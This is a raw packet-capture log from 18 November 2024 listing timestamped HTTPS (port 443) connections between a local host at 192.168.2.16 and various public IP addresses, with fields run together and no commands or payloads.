                                                                                                                                                                                            Nov 18, 2024 21:01:08.007690907 CET49914443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:08.007709026 CET44349914216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:08.513130903 CET49674443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:08.513180971 CET49675443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:08.513216019 CET49677443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:08.513468027 CET49915443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:08.513499975 CET44349915204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:08.513731956 CET49915443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:08.513931990 CET49915443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:08.513945103 CET44349915204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:08.543869972 CET49916443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:08.543956995 CET44349916204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:08.544246912 CET49916443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:08.544719934 CET49916443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:08.544748068 CET44349916204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:08.633075953 CET44349914216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:08.633976936 CET49914443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:08.634025097 CET44349914216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:08.634763956 CET44349914216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:08.641617060 CET49914443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:08.641773939 CET44349914216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:08.641776085 CET49914443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:08.683363914 CET44349914216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:08.692450047 CET49914443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:08.794519901 CET44349914216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:08.794962883 CET49914443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:08.795027018 CET44349914216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:08.795087099 CET49914443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:01:08.818453074 CET49674443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:08.818479061 CET49675443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:08.818667889 CET49677443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:08.930844069 CET49917443192.168.2.1620.190.159.71
                                                                                                                                                                                            Nov 18, 2024 21:01:08.930924892 CET4434991720.190.159.71192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:08.931045055 CET49917443192.168.2.1620.190.159.71
                                                                                                                                                                                            Nov 18, 2024 21:01:08.931953907 CET49917443192.168.2.1620.190.159.71
                                                                                                                                                                                            Nov 18, 2024 21:01:08.931988955 CET4434991720.190.159.71192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.277126074 CET44349915204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.277199030 CET49915443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.278198004 CET44349915204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.278251886 CET49915443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.295429945 CET49915443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.295442104 CET44349915204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.295907974 CET44349915204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.295977116 CET49915443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.296472073 CET49915443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.296504021 CET44349915204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.296677113 CET49915443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.300484896 CET44349916204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.300576925 CET49916443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.303900003 CET44349916204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.303981066 CET49916443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.306174994 CET49916443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.306184053 CET44349916204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.306359053 CET49916443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.306368113 CET44349916204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.306555986 CET44349916204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.306611061 CET49916443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.339329004 CET44349915204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.424448967 CET49674443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.424457073 CET49675443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.424643040 CET49677443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.454138994 CET44349915204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.454205990 CET49915443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.454266071 CET49915443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.454310894 CET44349915204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.454437971 CET49915443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.477488041 CET44349916204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.477554083 CET44349916204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.477612019 CET49916443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.477649927 CET44349916204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.477675915 CET49916443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.477782011 CET49916443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.477793932 CET44349916204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.477842093 CET49916443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.477965117 CET44349916204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.478025913 CET49916443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.478061914 CET44349916204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.478163958 CET44349916204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.478218079 CET49916443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.478430033 CET49916443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:09.478455067 CET44349916204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.483880997 CET49918443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:09.483947992 CET4434991823.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:09.484091997 CET49918443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:09.484384060 CET49918443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:09.484416962 CET4434991823.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.024337053 CET4434991720.190.159.71192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.024472952 CET49917443192.168.2.1620.190.159.71
                                                                                                                                                                                            Nov 18, 2024 21:01:10.065692902 CET49917443192.168.2.1620.190.159.71
                                                                                                                                                                                            Nov 18, 2024 21:01:10.065741062 CET4434991720.190.159.71192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.066194057 CET4434991720.190.159.71192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.068382025 CET49917443192.168.2.1620.190.159.71
                                                                                                                                                                                            Nov 18, 2024 21:01:10.068456888 CET49917443192.168.2.1620.190.159.71
                                                                                                                                                                                            Nov 18, 2024 21:01:10.068561077 CET4434991720.190.159.71192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.149235010 CET4434991823.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.149350882 CET49918443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:10.152055025 CET49918443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:10.152087927 CET4434991823.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.152163029 CET49918443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:10.152192116 CET4434991823.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.152473927 CET4434991823.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.152542114 CET49918443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:10.214363098 CET49683443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:10.216886044 CET49919443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:10.216989994 CET44349919204.79.197.222192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.217067003 CET49919443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:10.217534065 CET49919443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:10.217566013 CET44349919204.79.197.222192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.413074017 CET4434991720.190.159.71192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.413141012 CET4434991720.190.159.71192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.413218975 CET4434991720.190.159.71192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.413235903 CET49917443192.168.2.1620.190.159.71
                                                                                                                                                                                            Nov 18, 2024 21:01:10.413284063 CET4434991720.190.159.71192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.413324118 CET49917443192.168.2.1620.190.159.71
                                                                                                                                                                                            Nov 18, 2024 21:01:10.413764954 CET49917443192.168.2.1620.190.159.71
                                                                                                                                                                                            Nov 18, 2024 21:01:10.413804054 CET49917443192.168.2.1620.190.159.71
                                                                                                                                                                                            Nov 18, 2024 21:01:10.414349079 CET4434991720.190.159.71192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.414438963 CET4434991720.190.159.71192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.414515972 CET49917443192.168.2.1620.190.159.71
                                                                                                                                                                                            Nov 18, 2024 21:01:10.425251007 CET4434991823.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.425282955 CET4434991823.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.425302029 CET4434991823.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.425368071 CET49918443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:10.425419092 CET4434991823.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.425448895 CET49918443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:10.425467014 CET49918443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:10.425659895 CET4434991823.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.425729990 CET49918443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:10.425744057 CET4434991823.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.425767899 CET4434991823.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.425798893 CET49918443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:10.425825119 CET49918443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:10.426604033 CET49918443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:10.426635981 CET4434991823.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.431308985 CET49920443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:10.431351900 CET4434992023.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.431703091 CET49920443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:10.431940079 CET49920443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:10.431957006 CET4434992023.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.515475988 CET49683443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:10.555694103 CET49921443192.168.2.1620.190.159.71
                                                                                                                                                                                            Nov 18, 2024 21:01:10.555780888 CET4434992120.190.159.71192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.555978060 CET49921443192.168.2.1620.190.159.71
                                                                                                                                                                                            Nov 18, 2024 21:01:10.556205034 CET49921443192.168.2.1620.190.159.71
                                                                                                                                                                                            Nov 18, 2024 21:01:10.556241989 CET4434992120.190.159.71192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:10.627456903 CET49675443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:10.628269911 CET49677443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:10.628755093 CET49674443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:11.011236906 CET44349919204.79.197.222192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.011351109 CET49919443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:11.022384882 CET49922443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:11.022397995 CET49919443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:11.022428036 CET44349922142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.022454977 CET44349919204.79.197.222192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.022572041 CET49922443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:11.022763968 CET49919443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:11.022782087 CET44349919204.79.197.222192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.023005962 CET44349919204.79.197.222192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.023077011 CET49919443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:11.023885012 CET49922443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:11.023899078 CET44349922142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.024414062 CET49923443192.168.2.16142.250.185.174
                                                                                                                                                                                            Nov 18, 2024 21:01:11.024425983 CET44349923142.250.185.174192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.024491072 CET49923443192.168.2.16142.250.185.174
                                                                                                                                                                                            Nov 18, 2024 21:01:11.026091099 CET49923443192.168.2.16142.250.185.174
                                                                                                                                                                                            Nov 18, 2024 21:01:11.026102066 CET44349923142.250.185.174192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.030821085 CET49925443192.168.2.16142.250.186.34
                                                                                                                                                                                            Nov 18, 2024 21:01:11.030837059 CET44349925142.250.186.34192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.030904055 CET49925443192.168.2.16142.250.186.34
                                                                                                                                                                                            Nov 18, 2024 21:01:11.031064987 CET49926443192.168.2.16142.250.186.34
                                                                                                                                                                                            Nov 18, 2024 21:01:11.031110048 CET44349926142.250.186.34192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.031172991 CET49926443192.168.2.16142.250.186.34
                                                                                                                                                                                            Nov 18, 2024 21:01:11.031450987 CET49925443192.168.2.16142.250.186.34
                                                                                                                                                                                            Nov 18, 2024 21:01:11.031466961 CET44349925142.250.186.34192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.031584024 CET49926443192.168.2.16142.250.186.34
                                                                                                                                                                                            Nov 18, 2024 21:01:11.031609058 CET44349926142.250.186.34192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.086086035 CET4434992023.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.086239100 CET49920443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:11.086779118 CET49920443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:11.086783886 CET4434992023.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.086925983 CET49920443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:11.086930990 CET4434992023.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.119457960 CET49683443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:11.166470051 CET44349919204.79.197.222192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.166524887 CET44349919204.79.197.222192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.166549921 CET49919443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:11.166596889 CET44349919204.79.197.222192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.166632891 CET49919443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:11.166755915 CET49919443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:11.166763067 CET44349919204.79.197.222192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.166795015 CET44349919204.79.197.222192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.166827917 CET49919443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:11.166851044 CET49919443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:11.287410021 CET44349919204.79.197.222192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.287487030 CET49919443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:11.287524939 CET44349919204.79.197.222192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.287583113 CET49919443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:11.287734985 CET44349919204.79.197.222192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.287803888 CET49919443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:11.287837029 CET49919443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:11.287895918 CET44349919204.79.197.222192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.287956953 CET49919443192.168.2.16204.79.197.222
                                                                                                                                                                                            Nov 18, 2024 21:01:11.351907015 CET4434992023.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.351974964 CET4434992023.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.352000952 CET49920443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:11.352015018 CET4434992023.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.352041960 CET49920443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:11.352044106 CET4434992023.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.352098942 CET49920443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:11.352107048 CET4434992023.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.352133036 CET49920443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:11.352161884 CET49920443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:11.355504990 CET4434992023.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.355585098 CET49920443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:11.355592012 CET4434992023.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.355640888 CET49920443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:11.355643034 CET4434992023.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.355649948 CET49920443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:11.355649948 CET49920443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:11.355671883 CET4434992023.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.355703115 CET49920443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:11.355717897 CET49920443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:11.358191967 CET49927443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:11.358308077 CET4434992723.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.358669996 CET49927443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:11.358777046 CET49927443192.168.2.1623.1.33.206
                                                                                                                                                                                            Nov 18, 2024 21:01:11.358805895 CET4434992723.1.33.206192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.542654037 CET49928443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:11.542695999 CET44349928204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.542807102 CET49928443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:11.542996883 CET49929443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:11.543024063 CET44349929204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.543040991 CET49928443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:11.543051004 CET44349928204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.543078899 CET49929443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:11.543143034 CET49930443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:11.543154955 CET44349930204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.543191910 CET49929443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:11.543195963 CET44349929204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.543211937 CET49930443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:11.543277979 CET49930443192.168.2.16204.79.197.200
                                                                                                                                                                                            Nov 18, 2024 21:01:11.543282986 CET44349930204.79.197.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.682358980 CET4434992120.190.159.71192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.682899952 CET49921443192.168.2.1620.190.159.71
                                                                                                                                                                                            Nov 18, 2024 21:01:11.682980061 CET4434992120.190.159.71192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.683624029 CET49921443192.168.2.1620.190.159.71
                                                                                                                                                                                            Nov 18, 2024 21:01:11.683645964 CET4434992120.190.159.71192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.683690071 CET49921443192.168.2.1620.190.159.71
                                                                                                                                                                                            Nov 18, 2024 21:01:11.683707952 CET4434992120.190.159.71192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.924367905 CET44349926142.250.186.34192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.924664974 CET49926443192.168.2.16142.250.186.34
                                                                                                                                                                                            Nov 18, 2024 21:01:11.924695015 CET44349926142.250.186.34192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.925038099 CET44349926142.250.186.34192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.925348043 CET49926443192.168.2.16142.250.186.34
                                                                                                                                                                                            Nov 18, 2024 21:01:11.925460100 CET44349926142.250.186.34192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.925510883 CET49926443192.168.2.16142.250.186.34
                                                                                                                                                                                            Nov 18, 2024 21:01:11.925542116 CET44349926142.250.186.34192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.927980900 CET44349922142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.928179026 CET49922443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:11.928200960 CET44349922142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.932096004 CET44349922142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.932171106 CET49922443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:11.932460070 CET49922443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:11.932564020 CET49922443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:11.932574034 CET44349922142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.932641983 CET44349922142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.953962088 CET44349925142.250.186.34192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.954286098 CET49925443192.168.2.16142.250.186.34
                                                                                                                                                                                            Nov 18, 2024 21:01:11.954298019 CET44349925142.250.186.34192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.955737114 CET44349925142.250.186.34192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.955831051 CET49925443192.168.2.16142.250.186.34
                                                                                                                                                                                            Nov 18, 2024 21:01:11.956057072 CET49925443192.168.2.16142.250.186.34
                                                                                                                                                                                            Nov 18, 2024 21:01:11.956140995 CET44349925142.250.186.34192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.956216097 CET49925443192.168.2.16142.250.186.34
                                                                                                                                                                                            Nov 18, 2024 21:01:11.965435028 CET49926443192.168.2.16142.250.186.34
                                                                                                                                                                                            Nov 18, 2024 21:01:11.981431007 CET49922443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:01:11.981451988 CET44349922142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.991046906 CET44349923142.250.185.174192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.991329908 CET49923443192.168.2.16142.250.185.174
                                                                                                                                                                                            Nov 18, 2024 21:01:11.991343021 CET44349923142.250.185.174192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.992563009 CET44349923142.250.185.174192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.992645025 CET49923443192.168.2.16142.250.185.174
                                                                                                                                                                                            Nov 18, 2024 21:01:11.993855000 CET44349923142.250.185.174192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.993984938 CET49923443192.168.2.16142.250.185.174
                                                                                                                                                                                            Nov 18, 2024 21:01:11.994076967 CET49923443192.168.2.16142.250.185.174
                                                                                                                                                                                            Nov 18, 2024 21:01:11.994153976 CET44349923142.250.185.174192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:11.994265079 CET49923443192.168.2.16142.250.185.174
                                                                                                                                                                                            Nov 18, 2024 21:01:11.994275093 CET44349923142.250.185.174192.168.2.16
